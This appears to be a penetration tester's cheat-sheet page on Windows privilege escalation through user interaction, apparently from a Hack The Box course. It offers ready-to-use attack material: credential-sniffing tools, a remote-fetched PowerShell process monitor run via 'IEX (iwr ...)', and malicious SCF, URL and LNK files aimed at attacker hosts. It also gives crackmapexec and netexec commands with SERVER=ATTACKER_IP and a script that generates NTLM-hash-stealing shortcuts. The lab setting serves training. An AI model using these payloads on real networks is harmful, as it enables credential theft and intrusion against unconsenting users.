Interacting with Users

Traffic Capture

How to Find Passwords Using WiresharkInstructables

Tools

GitHub - DanMcInerney/net-creds: Sniffs sensitive data from interface or pcapGitHub

net-creds

GitHub - lgandx/PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.GitHub

PCreds

GitHub - odedshimon/BruteShark: Network Analysis ToolGitHub

BruteShark

GitHub - ShellCode33/CredSLayer: Extract credentials and other useful info from network capturesGitHub

CredSLayer

NetworkMiner - The NSM and Network Forensics Analysis Tool ⛏Netresec

NetMiner - Free Version

GitHub - mlgualtieri/NTLMRawUnHide: NTLMRawUnhide.py is a Python3 script designed to parse network packet capture files and extract NTLMv2 hashes in a crackable format. The following binary network packet capture formats are supported: *.pcap *.pcapng *.cap *.etlGitHub

Monitoring for Process Command Lines

procmon.ps1

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

PS C:\htb> IEX (iwr 'http://10.10.10.205/procmon.ps1') 

InputObject                                           SideIndicator
-----------                                           -------------
@{CommandLine=C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}} =>      
@{CommandLine=“C:\Windows\system32\cmd.exe” }                          =>      
@{CommandLine=\??\C:\Windows\system32\conhost.exe 0x4}                      =>      
@{CommandLine=net use T: \\sql02\backups /user:inlanefreight\sqlsvc My4dm1nP@s5w0Rd}       =>       
@{CommandLine=“C:\Windows\system32\backgroundTaskHost.exe” -ServerName:CortanaUI.AppXy7vb4pc2... <=

Vulnerable Services

Docker Desktop Community Edition before 2.1.0.1.

Elevation of Privilege in Docker for WindowsMedium

The program looks for docker-credential-wincred.exe and docker-credential-wincred.bat files in the C:\PROGRAMDATA\DockerDesktop\version-bin\. This directory was misconfigured to allow full write access to the BUILTIN\Users group, meaning that any authenticated user on the system could write a file into it (such as a malicious executable).

Any executable placed in that directory would run when a) the Docker application starts and b) when a user authenticates using the command docker login.

SCF on a File Share

Using SCFs no longer works on Server 2019 hosts, but we can achieve the same effect using a malicious .lnk file.

@Inventory.scf

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

sudo responder -wrf -v -I tun0

ntlm_theft

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

ntlm_theft supports the following attack types:

• Browse to Folder Containing

  • .url – via URL field

  • .url – via ICONFILE field

  • .lnk - via icon_location field

  • .scf – via ICONFILE field (Not Working on Latest Windows)

  • autorun.inf via OPEN field (Not Working on Latest Windows)

  • desktop.ini - via IconResource field (Not Working on Latest Windows)

• Open Document

  • .xml – via Microsoft Word external stylesheet

  • .xml – via Microsoft Word includepicture field

  • .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)

  • .docx – via Microsoft Word includepicture field

  • .docx – via Microsoft Word external template

  • .docx – via Microsoft Word frameset webSettings

  • .xlsx - via Microsoft Excel external cell

  • .wax - via Windows Media Player playlist (Better, primary open)

  • .asx – via Windows Media Player playlist (Better, primary open)

  • .m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)

  • .jnlp – via Java external jar

  • .application – via any Browser (Must be served via a browser downloaded or won’t run)

• Open Document and Accept Popup

  • .pdf – via Adobe Acrobat Reader

• Click Link in Chat Program

  • .txt – formatted link to paste into Zoom chat

CME

crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=ATTACKER_IP
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=ATTACKER_IP
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=ATTACKER_IP

Rocabella

GitHub - nickvourd/Rocabella: Sniffing files generatorGitHub

LNK File on a File Share

lnkdomb

GitHub - dievus/lnkbomb: Malicious shortcut generator for collecting NTLM hashes from insecure file shares.GitHub

Generating a Malicious .lnk File

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Netexec

NTLM Relaying - Making the Old New Again | JUMPSEC LABSJUMPSEC LABS

nxc smb IP -u username -p password -d domain.local -M slinky -o NAME=Shortcut SERVER=ATTACKER_IP

Rocabella

GitHub - nickvourd/Rocabella: Sniffing files generatorGitHub

URL Files on a File Share

This attack also works with .url files and responder -I eth0 -v

[InternetShortcut] 
URL=whatever 
WorkingDirectory=whatever 
IconFile=\10.10.10.10%USERNAME%.icon 
IconIndex=1

Obfuscated Files

Word, ppt, scf, lnk, etc

GitHub - sevagas/macro_pack: macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. The goal of macro_pack is to simplify exploitation, antimalware bypass, and automatize the process from malicious macro and script generation to final document generation. It also provides a lot of helpful features useful for redteam or security research.GitHub